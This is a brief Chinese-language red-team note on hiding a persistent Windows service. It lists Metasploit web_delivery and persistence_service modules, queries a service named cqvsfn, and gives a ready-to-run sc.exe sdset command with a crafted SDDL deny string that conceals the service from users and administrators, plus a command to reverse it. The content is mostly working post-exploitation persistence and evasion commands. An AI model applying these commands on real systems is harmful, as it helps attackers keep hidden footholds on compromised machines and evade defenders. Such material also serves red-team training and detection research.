隐藏服务-sddl

use exploit/multi/script/web_delivery 
use exploit/windows/local/persistence_service
cmd：
sc query cqvsfn
sc qc cqvsfn
powershell:
get-service -name cqvsfn

Joshua Wright提供的方法使用sc 命令的sdset模块可以修改服务的安全描述符:
SDDL隐藏
cmd:(隐藏服务)
sc.exe sdset cqvsfn "D:(D;;DCLCWPDTSDCC;;;IU)(D;;DCLCWPDTSDCC;;;SU)(D;;DCLCWPDTSDCC;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

powershell:(取消隐藏)
& $env:SystemRoot\System32\sc.exe sdset cqvsfn "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk